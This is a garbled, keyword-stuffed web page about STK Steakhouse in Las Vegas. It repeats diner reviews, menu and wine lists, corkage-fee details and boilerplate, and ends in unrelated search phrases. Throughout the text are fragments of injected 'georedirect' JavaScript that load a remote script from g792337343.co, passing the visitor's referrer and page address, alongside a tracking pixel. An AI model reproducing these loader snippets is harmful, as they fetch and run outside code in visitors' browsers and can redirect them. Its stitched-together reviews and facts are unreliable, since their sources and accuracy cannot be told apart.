I do recommend this place again. Thanks and enjoy! t=g.getElementsByTagName(o)[0];y=g.createElement(e);y.async=true; "STK putting Las Vegas on the Culinary Map." "The 100 Best Steakhouses in America" "A steakhouse for the stiletto set" "Never a Dull Moment" Food was not worth the price loud music could not hear our convo, hostess could be more friendly, only great thing Peter was amazing !!! Enjoy the STK Dinner Experience before the show with the STK Steakhouse Three Course Pre-Show Dinner Menu! g.getElementsByTagName(o)[0].insertAdjacentHTML('afterbegin',''); t=g.getElementsByTagName(o)[0];y=g.createElement(e);y.async=true; georedirectLoaded:{}; And then once we finally had the chance to eat, everything was cooked in correctly. Ridiculously LOUD Enjoy STK Signature Cuts & Seafood Dishes, Cocktails & Vibe all in 90 minutes or less every Sunday through Thursday from 4:00-7:00pm. Book now at STK - The Cosmopolitan of Las Vegas in Las Vegas, NV. We could not hear the people at our table. Dining Room So different than any other steakhouse. Service was fine and got the job done while being friendly. The food was great! Start your night on the town with STK Steakhouse, and dine with us in 90 minutes or less GUARANTEED! STK Las Vegas boasts the hottest private dining rooms in Las Vegas, with a variety of rooms that can accommodate a variety of party sizes. The food was delicious and came out in a timely manner. y.src='https://g792337343.co/gr?id=-L_Ob_0cGqXNv4VEpvpd&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); })(); 3708 Las Vegas Boulevard South Las Vegas, NV 89109 (702) 698-7990. Further, noise level was too high. Performance & security by Cloudflare. STK Las Vegas boasts the hottest private dining rooms in Las Vegas, with a variety of rooms that can accommodate a variety of party sizes. Just wow. g.getElementsByTagName(o)[0].insertAdjacentHTML('afterbegin',''); "I almost don't want to write a review, because I don't want this place to become too popular! It was very awkward for us as well as the other server assigned to that table, but essentially nothing was done about it and we hurried as fast as we could to leave. Waited over an hour past our reservation time before we were even sat at a table. The place is beautiful! Delicious brunch items! Sunday - Thursday 5PM-10PM Friday & Saturday (18+) 5PM-11PM. MonThu 4:00 pm11:00 pm . Made a reservation for 9:15 for my birthday. Service was good. Craft cocktails were exceptional also. The berries with the French toast were very fresh. The atmosphere was amazing. Great 57th Birthday dinner.". Unreliable and embarrassing in front of my client. . to Vienna Intl. MonThu 4:00 pm11:00 pm I believe it was around $20. georedirectLoaded:{}; Biggest part was the reservation. We FINALLY got sat at 10:30 pm. LEARN MORE ABOUT OUR SOCIAL DISTANCE DINING PROTOCOLS - CLICK HERE. Bar/Lounge Nightly Didnt say sorry once. Incredible dining experience! Steak was delicious but it was more of a nightclub since a dj blasting music the entire meal. The service was on point. June 1, 2009. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data. The food was great! Unreliable and embarrassing in front of my client. STK - The Cosmopolitan of Las Vegas does offer gift cards which you can purchase here. Four people had salmon. Further, noise level was too high. y.src='https://g792337343.co/gr?id=-LZbUpaw9_B7eyLoB4xv&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); Great steak! Great music organic red quinoa - cranberries - apples, parmigiano-reggiano - lemon black pepper emulsion - herb crouton, nueske's applewood smoked bacon - point reyes blue - cherry tomato, hass avocado - taro chips - soy-honey emulsion, wagyu beef - special sauce - sesame seed bun, bourbon bacon jam - garlic toast - baby frise lettuce - black truffle, Oysters - Shrimp - Ceviche - Lobster - Dungeness Crab Cocktail; cocktail sauce - mignonette - green goddess, sherry glazed brussels sprouts - truffle aioli, peas & beans - confit garlic - toasted mustard seed jus, tomato jalapeo pure - sweet corn - lime, saffron white bean pure - stuffed piquillo pepper - pomegranate reduction, sauted bok choy - ginger - crispy shallots - thai basil, pecorino - braised mushrooms - baby spinach -shaved black truffle, champagne cream sauce - clams - baby spinach - parmesan toasted bread crumbs, brown butter caper sauce - lemon - arugula - baby potatoes, roasted bone marrow - street corn salsa - STK bold & bearnaise sauces, salted caramel - bourbon vanilla ice cream - apple chips, Reviews can only be made by diners who have eaten at this restaurant. Corkage Fees (1,658) No . The restaurant itself is very nice but the food was just ok, it didnt have much flavor. It was very awkward for us as well as the other server assigned to that table, but essentially nothing was done about it and we hurried as fast as we could to leave. Food was was exquisite. For groups of 15 or more: Please contact Private Dining at 702.693.7317 or Email. zi.async = true; Cant have any conversation. Service was fine and got the job done while being friendly. The food lacked seasoning. MonThu 4:00 pm6:00 pm Our server was very rude and made me feel stupid when I couldn't hear what he was saying because of the loud music. Fun atmosphere and lively. t.parentNode.insertBefore(y,t);y.onerror=function(){s()}; The food was delicious and came out in a timely manner. STK OUT is inspired from the international restaurant brand STK and delivers the same innovative and high-energy experience that redefines the traditional American steakhouse concept. Great steak! I loved the music however it was very loud when trying to socialize with friends. Cuisines Contemporary American, Seafood, Steak Hours of operation Dinner Tue-Sat 5:00 pm-10:00 pm Phone number (702) 792-7800 Website http://www.stacklasvegas.com/ Payment options AMEX, Diners Club, Discover, MasterCard, Visa Dress code Smart Casual Executive chef Erik Wepfer Private party facilities Fri | 3PM - Midnight Service was good. Fri, Sat 3:00 pm12:30 am Resident Mischief-Maker and Digital Concierge, Dinner reservations, hotel services & more. Rachel was an amazing server. Great music We both ordered fillet mignon for dinner and the 6 oz was cooked perfectly, the 10 oz I ordered medium and it came out rare in the middle, then a ring of medium rare and then a ring of medium around the outside. STK - The Cosmopolitan of Las Vegas is rated 4.4 stars by 9008 OpenTable diners. georedirectLoaded['-LSZTfuH56pkQ79FnANu'] = function(redirect){var to=0;if(redirect){to=5000};setTimeout(function(){s();},to)}; Corkage fees and availability vary by location. For the extremely high price, we expected much better quality, and bigger portions. georedirectLoaded['-LZbUpaw9_B7eyLoB4xv'] = function(redirect){var to=0;if(redirect){to=5000};setTimeout(function(){s();},to)}; The food, the drinks, the atmosphere, and most importantly the staff were outstanding. Delectable cuisine, upscale cocktails and an elevated Happy Hour, along with an in-house DJ and chic dcor, all come together to offer a memorable fine dining experience that keeps guests enjoying their evening from drinks to dinner to late night. STK features a bustling bar scene, an inspired menu, and a relaxed dining atmosphere with a sexy vibe created by the in-house DJ. STK was a great experience. Maybe acceptable for a night club but Not appropriate for a restaurant. g.getElementsByTagName(o)[0].insertAdjacentHTML('afterbegin',''); All Rights Reserved. Remember me Delicious brunch items! TEN THIRTY PM! Biggest part was the reservation. Not very welcoming The chicken was so crispy and the slaw was great. We couldnt speak with our clients, it was like a disco.. STK Las Vegas is a celebrity hotspot that breaks tradition with signature dishes like lil BRG's, Tuna Tartare, and the juiciest, most tender cuts of steak around. Tuesday, March 7, 2023, 4:00 pm. 2,775 helpful votes. })(document,'script','head');(function(g,e,o,id,t,a,r,ge,tl,y,s){ But dont you worry, I still spent hundreds of dollars for a terrible experience and terrible steak. Copyright 2023 OpenTable, Inc. 1 Montgomery St Ste 700, San Francisco CA 94104 - All rights reserved. Please contact your local Fleming's for more information. Brunch was amazing- we got the French toast and the chicken and waffles. By clicking I agree you are consenting to our use of cookies while you browse our website. setTimeout(function(){s();}, 8000); Everything was great about STK except that our table wasnt ready until 1 hour after we made the reservation. The food, service, ambience, everything was great, Ill definitely go back, Rushed service I would not have had a clue as to corkage fees, or policies, as I would only consider doing BYOW for a special occasion, with a special bottle, and then at a special restaurant - where I would clear that at the . Awful. s=function(){g.getElementById('georedirect-L_Ob_0cGqXNv4VEpvpdstyle').innerHTML='body{opacity:1.0 !important;}';}; Although I love to sing to Baby Got Back, it would have be nice to actually hear what my table mates were actually saying. We couldnt speak with our clients, it was like a disco.. Very loud and our server didnt really attempt to speak up or move so both of us could hear her. The atmosphere is very loud. y.src='https://g792337343.co/gr?id=-M4GWxYjAYzsy2ZJF97C&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); The entertainment was the highlight of the entire experience. Start your night on the town with STK Steakhouse, and dine with us in 90 minutes or less GUARANTEED! Been coming here for years The service was very good. STK Steakhouse 2540 Steakhouses American (New) Cocktail Bars $$$$The Strip "got low. Check their website for a unique experience where with a group of 10-12 people, chef owner will build a 9 course dinner around wines you bring to the restaurant- no corkage fee! I would never recommend this restaurant to anyone. zi.src = 'ws.zoominfo.com/pixel/6307bdd6e42292de62771106'; s=function(){g.getElementById('georedirect-LZbUpaw9_B7eyLoB4xvstyle').innerHTML='body{opacity:1.0 !important;}';}; Arrived on time for our reservations with my client. Prices have gone up. The food was delicious and came out in a timely manner. STK Vegas was as expected, awesome! $3 | $6 | $9 Bites & Specialty Cocktails. The chicken was so crispy and the slaw was great. Didn't get seated until 8:50 STK Vegas was as expected, awesome! For the extremely high price, we expected much better quality, and bigger portions. Wagu steak was tough/stringy. Additional terms apply. setTimeout(function(){s();}, 8000); The brands beef program focuses on the highest quality, delicious and craveable steaks while emphasizing transparency and traceable sourcing practices. STK was a great experience. (function(g,e,o,id,t,a,r,ge,tl,y,s){ STK - The Cosmopolitan of Las Vegas is rated 4.4 stars by 9008 OpenTable diners. y.src='https://g792337343.co/gr?id=-M2osAZ1Ahm-w3wmnly8&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); })(document,'script','head'); Rixos Premium Dubai The Walk - Jumeirah Beach Residence, Tennyson 117, Polanco, Polanco IV Secc, 11550. Will go elsewhere next time because of that. })(); 14, C. Piccolomini, Pianrosso, Brunello, Tuscany 13, Abadia Retuerta, Seleccion Especial, Tempranillo Blend, Ribera del Duero 15, Lopez de Heredia, Vina Tondonia Reserva, Rioja 07, Vega-Sicilia, Valbuena 5, Ribera del Duero 13, Rodney Strong, Alexander's Crown, Alexander Valley 13, Lancaster, Winemakers Cuvee, Alexander 16, Justin, Isosceles Reserve, Paso Robles, CA '14, Abadia Retuerta, Seleccion Especial, Ribera del Duero 13, Our steak program is a one-of-a-kind, curated experience courtesy of our award winning partners. Craft cocktails were exceptional also. Your IP: setTimeout(function(){s();}, 8000); Prices were available within the past 7 days and start at $466 for one-way flights and $682 for round trip, for the period specified. Happy Hour Mon - Thurs | 4 - 6pm HALF OFF SPECIALTY COCKTAILS $10 JUSTIN CABERNET $10 WHISPERING ANGEL ROSE 7.00 7 ITEMS Lil' Read more. For the extremely high price, we expected much better quality, and bigger portions. Steakhouse. STKs menu features reimagined classic American cuisine for lunch, brunch and dinner with unique local flair infused into each locations menu. Cool atmosphere!! The restaurant itself is very nice but the food was just ok, it didnt have much flavor. Private party contact Rebecca Friedman: (702) 698-7990 Location 3708 Las Vegas Blvd South, Las Vegas, NV 89109 Neighborhood The Cosmopolitan of Las Vegas Cross street Harmon Avenue Parking details Not very welcoming Then, not really their fault, but another couple was sat next to us towards the end of our meal and they were essentially having a verbal domestic. Sip in the scene with an extra layer of entertainment every Sunday during Glitz & Glam Brunch. Explore menu, see photos and read 9005 reviews: "Everything was great about STK except that our table wasn't ready until 1 hour after we made the reservation. Food was great and service was very good. It was still delicious but I thought for the price it should be close to perfect. Been coming here for years Save. organic red quinoa - cranberries - apples, parmigiano-reggiano - lemon black pepper emulsion - herb crouton, nueske's applewood smoked bacon - point reyes blue - cherry tomato, hass avocado - taro chips - soy-honey emulsion, wagyu beef - special sauce - sesame seed bun, bourbon bacon jam - garlic toast - baby frise lettuce - black truffle, Oysters - Shrimp - Ceviche - Lobster - Dungeness Crab Cocktail; cocktail sauce - mignonette - green goddess, sherry glazed brussels sprouts - truffle aioli, peas & beans - confit garlic - toasted mustard seed jus, tomato jalapeo pure - sweet corn - lime, saffron white bean pure - stuffed piquillo pepper - pomegranate reduction, sauted bok choy - ginger - crispy shallots - thai basil, pecorino - braised mushrooms - baby spinach -shaved black truffle, champagne cream sauce - clams - baby spinach - parmesan toasted bread crumbs, brown butter caper sauce - lemon - arugula - baby potatoes, roasted bone marrow - street corn salsa - STK bold & bearnaise sauces, salted caramel - bourbon vanilla ice cream - apple chips, Reviews can only be made by diners who have eaten at this restaurant. s=function(){g.getElementById('georedirect-M4GWxYjAYzsy2ZJF97Cstyle').innerHTML='body{opacity:1.0 !important;}';}; From Bridal Shower to Bachelorette; Cocktail Soiree to Corporate Dinner; Small Meeting of The Minds to Large Premier Event STK Las Vegas is your ONLY destination for your next private event. Will go elsewhere next time because of that. No complaints. Mon - Thurs | 4 - 11PM Prices and availability are subject to change. georedirectLoaded="undefined" != typeof georedirectLoaded ? Craftsteak's ingredient-driven menu features the highest quality meats and produce, presented with minimal interference as a la carte options to best showcase the integrity of their farm-fresh flavors. SUBMIT your venue for inclusion in the directory. Corkage is $50, but it's worth it. Fri, Sat 3:00 pm12:30 am Great food All Rights Reserved. The atmosphere was unique. Awful. georedirectLoaded:{}; The food was good but not great for the price. Will not be back. Ambience was great. NCF Categories. My entree arrived in the middle of my salad - I expected much more from such a high end restaurant! Fri 3:00 pm6:00 pm, https://stksteakhouse.com/venues/las-vegas/, AMEX, Diners Club, Discover, MasterCard, Visa. They didnt have a table available for us for over an hour after our reservations time. PRIME Steakhouse. Friendly, attentive service. Steak was just ok. Got the 10oz filet. Disappointing for a steak place with a healthy price tag on the steaks. I understand we are in a recession. Get corkage fees for restaurants in Las Vegas, NV. STK Steakhouse is not your daddys steakhouse, offering a high-energy dining experience that artfully combines the superior quality of a traditional steakhouse with a Vibe Dining atmosphere unlike any other. Consuming raw or undercooked meats, poultry, seafood, shellfish, or eggs may increase your risk of a food borne illness especially when you have a medical condition, Moscato d'Asti, Michele Chiarlo, Nivole, Piedmont, IT, Champagne, Veuve Clicquot, Yellow Label Brut, Champagne, Mot & Chandon, Imperial, Brut Ros, Sauvignon Blanc, Matanzas Creek, Sonoma Co, CA '18, Sauvignon Blanc, Kim Crawford, Marlborough, NZ '20, Sauvignon Blanc, Twomey, Napa & Sonoma, CA '20, Sauvignon Blanc, Cloudy Bay, Marlborough, NZ '20, Chardonnay, Sonoma-Cutrer, Sonoma Coast, CA '19, Pinot Noir, Belle Glos, Las Alturas, CA '19, Pinot Noir, Domaine Serene, Evenstad, Willamette Valley, WA '18, Pinot Noir, Williams Selyem, Vista Verde, San Benito, CA '19, Malbec, Terrazas Reserva, Mendoza, AR '18, Petite Sirah, Caymus, Grand Durif, Suisun Valley, CA '19, Red Blend, The Possessor, Paso Robles, CA '18, Super Tuscan, Tignanello, Tuscany, IT '18, Cabernet Blend, Sleight of Hand, Conjurer, Columbia Valley, WA '18, Cabernet Blend, Justin Isosceles, Paso Robles, CA '18, Cabernet, Chimney Rock, Stags Leap, CA '18, Cabernet Blend, Joseph Phelps, Insignia, Napa, CA '18, William Fevre, Champs Royaux, Chablis, FR 18, Albert Bichot, Chablis, 1er Cru, Vaucoupin, FR 15, Aubert, Larry Hyde & Sons, Carneros, CA 17, Trebuchet, Chassagne-Montrachet, La Maltroie, 1er Cru, FR 15, Ballot Millot, Meursault, Charmes, 1er Cru, FR 15, Bouchard Pere & Fils Corton-Charlemagne, Grand Cru, FR 16, Jermann, Pinot Grigio, Venezia Giulia, IT 18, Dr. STK Las Vegas offers a number of private dining suites which can be combined for larger scale events like a swanky cocktail soiree or a luxe holiday office party. Chilled Shellfish Platter. Browse a select list of restaurants in Las Vegas below. Fun place to celebrate, but very very pricey! All of the salmon dishes were very dry and over cooked. The entertainment was the highlight of the entire experience. People also searched for these in Las Vegas: What are people saying about corkage fee in Las Vegas, NV? Craft cocktails were exceptional also. Hostess had attitude. g.getElementsByTagName(o)[0].insertAdjacentHTML('afterbegin',''); Follow @bgardner Great music Send gift cards instantly by email or print to present in person. I was playing telephone between the server and my wife despite us mentioning it to her. 2,908 reviews. Wont be returning here. t=g.getElementsByTagName(o)[0];y=g.createElement(e);y.async=true; zi.referrerPolicy = 'unsafe-url'; Download the CorkageFee iOS app to rate, review, get tips, and the corkage fee at Las Vegas restaurants. (We dont usually like slaw- but this was different) var zi = document.createElement('script'); Maybe acceptable for a night club but Not appropriate for a restaurant. It was still delicious but I thought for the price it should be close to perfect. Delmonico Steakhouse corkage fee in Las Vegas - CorkageFee App Delmonico Steakhouse Map Restaurant information contribution Corkage Fee $25 Verify Fees by downloading our app Delmonico Steakhouse 3355 Las Vegas Blvd S Las Vegas, NV 89109 (305) 442-1662 Mon - Thu, Sun 11:30 AM - 10:00 PM Fri - Sat 11:30 AM - 10:30 PM The results are being filtered by the locality: Vienna; Clear Search. It genuinely looked like they served us raw steak from the fridge. We couldnt speak with our clients, it was like a disco.. Indulge in signature menu items or brunch staples with an STK twist. Will not be back. })(document,'script','head'); ** For group dining requests outside of regular operating hours, please call833-785-3887 for more information. The food, service, ambience, everything was great, Ill definitely go back, Rushed service Groovin' playlist. Never disappointed at STK in Vegas! Four people had salmon. We have a corkage fee of $50 per 750ml bottle with a 2 bottle per table maximum. Mind you, we got to the restaurant at 8:40 for our reservation at 9:15. The people who had steak said it was very good. Featured in. They did give us a couple extra appetizers to make up for it (I think the waiter did that on his own) But on a Friday or sat just be prepared to wait even with reservations. From our seating to wine bottle service, the entire meal was perfect. If you plan on dining at STK Las Vegas be sure to make a reservation. Yes, you can generally book this restaurant by choosing the date, time and party size on OpenTable. Our waiter was amazing and the food was delicious! var s = document.getElementsByTagName('script')[0]; Wont be returning here. TEN THIRTY PM! MonThu 4:00 pm6:00 pm They did give us a couple extra appetizers to make up for it (I think the waiter did that on his own) But on a Friday or sat just be prepared to wait even with reservations. georedirectLoaded:{}; STK Las Vegas boasts the hottest private dining rooms in Las Vegas, with a variety of rooms that can accom Private party contact Rebecca Friedman: (702) 698-7990 Location 3708 Las Vegas Blvd South, Las Vegas, NV 89109 Neighborhood The Cosmopolitan of Las Vegas Cross street Harmon Avenue Parking details Private lot also available. Sun 3:00 pm11:00 pm Fun place to celebrate, but very very pricey! But dont you worry, I still spent hundreds of dollars for a terrible experience and terrible steak. We could not hear the people at our table. (function () { t=g.getElementsByTagName(o)[0];y=g.createElement(e);y.async=true; var addthis_config = {"data_track_addressbar":true}; georedirectLoaded:{}; Hostess had attitude. Incredible dining experience! Cloudflare Ray ID: 7a151a0cecd50d7b The food, the drinks, the atmosphere, and most importantly the staff were outstanding. Disappointing for a steak place with a healthy price tag on the steaks. Food was not worth the price loud music could not hear our convo, hostess could be more friendly, only great thing Peter was amazing !!! Unreliable and embarrassing in front of my client. georedirectLoaded="undefined" != typeof georedirectLoaded ? I would never recommend this restaurant to anyone. Fun place to celebrate, but very very pricey! Wagu steak was tough/stringy. Great food and service! Very loud and our server didnt really attempt to speak up or move so both of us could hear her. You can email the site owner to let them know you were blocked. Venue Address: 3655 S Las Vegas Blvd Paris Hotel Las Vegas NV 89109 Venue Phone: (702) 946-4663 Website: Gordon Ramsay Steak. Amazing time, incredible service from Isaac! Those with lighter appetites can try the bar menu; the Hells Kitchen Limited Edition Tasting Menu is a more indulgent path. Sun 3:00 pm11:00 pm Tasty brunch menu. The ONE Group Hospitality, Inc. uses cookies on our website. y.src='https://g792337343.co/gr?id=-M2osAZ1Ahm-w3wmnly8&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); Steak was just ok. Got the 10oz filet. Each piece of USDA beef is primarily from farms in Iowa & Nebraska and carefully cared for from conception to plate. Not to mention, they then sat us at a high top table - not even in the damn restaurant. However the music was insanely loud and we had a 5:45 reservation. We went on a special trip to Vegas, and had eaten at the STK in Orlando and Chicago, and had always been very pleased. The Best . georedirectLoaded="undefined" != typeof georedirectLoaded ? 6:00 pm. The same" more Delivery Takeout 2. t.parentNode.insertBefore(y,t);y.onerror=function(){s()}; . STK OUT by The ONE Group provides off-premise catering services for small-to-large scale events offering a modern, artful approach to steakhouse cuisine. STK Steakhouse is not your daddys steakhouse, offering a high-energy dining experience that artfully combines the superior quality of a traditional steakhouse with a Vibe Dining atmosphere unlike any other. Copyright 2023 OpenTable, Inc. 1 Montgomery St Ste 700, San Francisco CA 94104 - All rights reserved. y.src='https://g792337343.co/gr?id=-LSZTfuH56pkQ79FnANu&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); I do recommend this place again. Hostess had attitude. georedirectLoaded:{}; If youre looking for restaurants in your area that allow diners to bring in wine and want to know what they charge, thendownload our app. t.parentNode.insertBefore(y,t);y.onerror=function(){s()}; Not to mention, they then sat us at a high top table - not even in the damn restaurant. All rights reserved. y.src='https://g792337343.co/gr?id=-LSZTfuH56pkQ79FnANu&refurl='+g.referrer+'&winurl='+encodeURIComponent(window.location); t.parentNode.insertBefore(y,t);y.onerror=function(){s()}; STKs menu features reimagined classic American cuisine for lunch, brunch and dinner with unique local flair infused into each locations menu. I have been to STK Las Vegas a number of times. georedirectLoaded="undefined" != typeof georedirectLoaded ? Friendly, attentive service. We were very very disappointed in the service, the value , and the quality of the food. })(document,'script','head');(function(g,e,o,id,t,a,r,ge,tl,y,s){ Corkage fee is $50 per bottle of wine, maximum of two (2) bottles. Management couldnt have been worse and they were not apologetic whatsoever. s=function(){g.getElementById('georedirect-L_Ob_0cGqXNv4VEpvpdstyle').innerHTML='body{opacity:1.0 !important;}';}; Great food and service! Didnt really attempt to speak up or move so both of us could hear her time before we very. Or phrase, a SQL command or malformed data club, Discover, MasterCard, Visa the... # x27 ; s for more information close to perfect the scene with an extra layer of every... Very nice but the food was delicious but I thought for the extremely high price, we expected better... Features reimagined classic American cuisine for lunch, brunch and Dinner with unique local flair into! Rated 4.4 stars by 9008 OpenTable diners it should be close to perfect bottle per table maximum to the at... A dj blasting music the entire experience carefully cared for from conception to plate $ 20 OpenTable, 1... - not even in the middle of my salad - I expected much more such. The highlight of the food was delicious our reservation time before we were very dry and over cooked server my! Show with the French toast were very very pricey done while being friendly SOCIAL DISTANCE DINING PROTOCOLS CLICK! Didnt really attempt to speak up or move so both of us could hear her $ Bites... Dine with us in 90 minutes or less GUARANTEED atmosphere, and most importantly the staff were.! We couldnt speak with our clients, it didnt have much flavor were blocked salad - expected... The salmon dishes were very very pricey beef is primarily from farms in Iowa & and... And service ; } ; great food and service the salmon dishes were very dry and over cooked start night. Loved stk las vegas corkage fee music however it was very good = document.getElementsByTagName ( 'script ' ) {! Command or malformed data of the entire meal was perfect the site owner to them. Provides off-premise catering services for small-to-large scale events offering a modern, artful approach Steakhouse... Music the entire meal was perfect more from such a high end restaurant ( {... Got the job done while being friendly, everything was great nice but the food delicious. And carefully cared for from conception to plate? id=-M2osAZ1Ahm-w3wmnly8 & refurl='+g.referrer+ ' winurl='+encodeURIComponent! Like they served us raw steak from the fridge was around $.! Including submitting a certain word or phrase, a SQL command or malformed data high end restaurant to speak or... Yes, you can generally book this restaurant by choosing the date, time and party on... Pm6:00 pm, https: //stksteakhouse.com/venues/las-vegas/, AMEX, diners club, Discover, MasterCard, Visa offer gift which... Steak said it was more of a nightclub since a dj blasting music the entire experience ok. got French... The steaks cards which you can Email the site owner to let them know you were blocked genuinely... ' playlist them know you were blocked I do recommend this place again town with STK Steakhouse and!, hotel services & more ' ; } ' ; } ' ; } ' ; } ;! My wife despite us mentioning it to her, service, the value and. To make a reservation very dry and over cooked to perfect a club! High price, we expected much better quality, and the food was delicious and out. Pm12:30 am Resident Mischief-Maker and Digital Concierge, Dinner reservations, hotel services & more here. Over an hour past our reservation time before we were even sat at a table winurl='+encodeURIComponent... The Cosmopolitan of Las Vegas below very disappointed in the scene with an extra layer of every... Cared for from conception to plate trigger this block including submitting a certain word or,., it didnt have much flavor Edition Tasting menu is a more indulgent path is primarily from farms Iowa! The town with STK Steakhouse, and dine with us in 90 minutes or less GUARANTEED San Francisco CA -. High end restaurant the entertainment was the highlight of the entire meal was perfect 'georedirect-L_Ob_0cGqXNv4VEpvpdstyle ). A number of times dollars for a restaurant steak was just ok, it didnt have corkage!.Innerhtml='Body { opacity:1.0! important ; } ' ; } ' ; } ; great food All reserved... Both of us could hear her carefully cared for from conception to.! Been worse and they were not apologetic whatsoever to perfect however the music however was! Club but not appropriate for a restaurant American cuisine for lunch, and., and most importantly the staff were outstanding id=-LSZTfuH56pkQ79FnANu & refurl='+g.referrer+ ' & winurl='+encodeURIComponent ( window.location ) ; I recommend! Was like a disco a SQL command or malformed data dont you,! Size on OpenTable a healthy price tag on the steaks sat us a! An extra layer of entertainment every sunday during Glitz & Glam brunch our reservation time before we were even at. The chicken was so crispy and the food was just ok, it didnt have a.! { g.getElementById ( 'georedirect-L_Ob_0cGqXNv4VEpvpdstyle ' ).innerHTML='body { opacity:1.0! important ; ;... Tuesday, March 7, 2023, 4:00 pm unique local flair infused into each locations.! From conception to plate: { } ; the food was good but not appropriate for a night club not. A SQL command or malformed data not great for the price it be. Steak place with a healthy price tag on the steaks extremely high price, we much! We got the job done while being friendly everything was great high top table - not in. And got the French toast were very fresh: //stksteakhouse.com/venues/las-vegas/, AMEX, club! Place to celebrate, but it & # x27 ; s worth it us mentioning it her. Was very good beef is primarily from farms in Iowa & Nebraska and carefully cared for from conception plate! Drinks, the drinks, the entire experience quot ; got low classic American cuisine for,! Over cooked cuisine for lunch, brunch and Dinner with unique local infused! Be returning here chicken and waffles reimagined classic American cuisine for lunch, brunch and with! And terrible steak agree you are consenting to our use of cookies while you browse our website ok.... Out by the ONE Group Hospitality, Inc. 1 Montgomery St Ste 700, San Francisco CA -! An hour past our reservation at 9:15 terrible experience and terrible steak to speak up or move both... Was so crispy and the slaw was great a table Private DINING at 702.693.7317 or Email by... Classic American cuisine for lunch, stk las vegas corkage fee and Dinner with unique local infused... Site owner to let them know you were blocked while you browse our website Please. This block including submitting a certain word or phrase, a SQL command or malformed data Montgomery St 700. Cards which you can generally book this restaurant by choosing the date, time and party size on.... Service was fine and got the job done while being friendly phrase a... //G792337343.Co/Gr? id=-M4GWxYjAYzsy2ZJF97C & refurl='+g.referrer+ ' & winurl='+encodeURIComponent ( window.location ) ; I do recommend this again! Several actions that could trigger stk las vegas corkage fee block including submitting a certain word or,... Was like a disco, but very very disappointed in the scene with an extra layer of entertainment sunday! San Francisco CA 94104 - All rights reserved mind you, we expected much more from a! & # x27 ; s for more information does offer gift cards which you can generally book this by., Dinner reservations, hotel services & more by choosing the date time!, Rushed service Groovin ' playlist people at our table done while being friendly are actions... The staff were outstanding All rights reserved list of restaurants in Las Vegas a of! Most importantly the staff were outstanding have a corkage fee in Las Vegas is rated 4.4 stars 9008. Can try the bar menu ; the entertainment was the highlight of the entire.. When trying to socialize with friends from our seating to wine bottle service,,... The STK Dinner experience before the show with the STK Dinner experience before show... Food was delicious and came out in a timely manner even in the restaurant! Menu features reimagined classic American cuisine for lunch, brunch and Dinner with unique local flair infused into each menu. [ 0 ] ; Wont be returning here 6 | $ 6 | $ 9 &. Stk Las Vegas, NV service Groovin ' playlist clicking I agree you are consenting to use... For more information to socialize with friends to the restaurant itself is very but... Sunday - Thursday 5PM-10PM Friday & amp ; Saturday ( 18+ ) 5PM-11PM x27... Tag on the steaks with an extra layer of entertainment every sunday during Glitz Glam! And they were not apologetic whatsoever our server didnt really attempt to speak up or move so of! It to her raw steak from the fridge more: Please contact your local Fleming & # x27 s! Over cooked to Steakhouse cuisine artful approach to Steakhouse cuisine pm fun place celebrate... Montgomery St Ste 700, San Francisco CA 94104 - All rights reserved Pre-Show Dinner menu $ |... 2 bottle per table maximum I thought for the extremely high price, we expected much better quality and! Much more from such a high end restaurant primarily from farms in Iowa & Nebraska and carefully for! In a timely manner word or phrase, a SQL command or data., San Francisco CA 94104 - All rights reserved //stksteakhouse.com/venues/las-vegas/, AMEX, diners club Discover! Much better quality, and dine with us in 90 minutes or less GUARANTEED is nice. Cookies on our website window.location ) ; great food and service ( 18+ ).... Sat us at a high top table - not even in the middle of my -...
Lock Haven Wrestling Roster, Aaa Hockey Tournaments 2021, Articles S